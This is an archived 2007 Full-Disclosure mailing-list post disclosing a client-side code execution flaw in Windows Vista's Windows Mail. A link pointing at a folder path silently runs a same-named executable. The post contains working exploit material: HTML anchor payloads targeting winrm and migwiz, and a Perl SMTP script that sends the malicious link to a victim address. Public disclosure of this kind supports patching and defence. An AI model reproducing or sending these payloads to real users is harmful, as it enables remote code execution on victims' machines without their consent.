[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability

To: <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability
From: "Kingcope" <kingcope@xxxxxxx>
Date: Fri, 23 Mar 2007 08:52:09 +0100

Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability
Successfully Tested on Windows Vista Ultimate

Greetings fly out to Alex,wtfomg,Thierry,Andi and Blackzero

Description
Windows Mail is the default Mail Client of Microsoft Windows Vista.

Vulnerability
Remote Code Execution is possible if a user clicks on a malicious prepared link.
Vistas Mail Client will execute any executable file if a folder exists with the 
same name.
For example the victim has a folder in C:\ named blah and a batch script named 
blah.bat
also in C:\. Now if the victim clicks on a link in the email message with the 
URL target
set to C:\blah the batch script is executed without even asking.
There is for example a CMD script by default in C:\Windows\System32\ named 
winrm.cmd
(and also a folder named winrm inside System32).

Exploit:
Send a HTML email message containing the URL:
<a href="c:/windows/system32/winrm?">Click here!</a>
or
<a href="c:/windows/system32/migwiz?">Click here!</a>
and winrm.cmd/migwiz.exe gets executed without asking for permission.
These are just examples.

I could not pass arguments to winrm (hehe this would be beautiful), but I guess 
there
are several attack vectors.

Proof of Concept
---snip---
use Net::SMTP_auth;
$smtp = Net::SMTP_auth->new('smtp.1und1.de', Debug => 1);

$smtp->auth('PLAIN', 'username', 'password');
$smtp->mail("attacker\@attacker.com");
$smtp->to("victim\@victim.com");

$msg = "Subject: Vista Remote Code Exec\r\n"
."From: attacker\@attacker.com\r\n"
."To: victim\@victim.com\r\n"
."MIME-Version: 1.0\r\n"
."Content-Type: text/html\r\n\r\n<a href=\"c:/windows/system32/winrm?\">Click 
here!</a>";
$smtp->data();
$smtp->datasend("$msg\n");
$smtp->dataend();
$smtp->quit;
---snip---


Signed,

Kingcope / kingcope[at]gmx.net / 2007

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Sexy, spankable 22 year old girl looking for a wild time
Next by Date: Re: [Full-disclosure] Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability
Previous by thread: [Full-disclosure] [ MDKSA-2007:069 ] - Updated inkscape packages to format string vulnerability
Next by thread: Re: [Full-disclosure] Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability
Index(es):
- Date
- Thread